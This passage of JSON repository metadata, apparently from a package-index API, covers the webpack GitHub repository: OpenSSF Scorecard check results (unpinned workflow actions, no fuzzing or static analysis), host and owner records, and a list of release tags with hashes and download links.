.github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36974490,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.110.1","sha":"0b2952e15bb1aa9a198acbbfdcb9a0dc1aabb5af","kind":"commit","published_at":"2026-08-27T20:00:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1/manifests"},{"name":"v5.110.0","sha":"3a7c0e6e27f90f9c5e407c18506a5034aabcf27d","kind":"commit","published_at":"2026-08-27T11:27:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0/manifests"},{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webp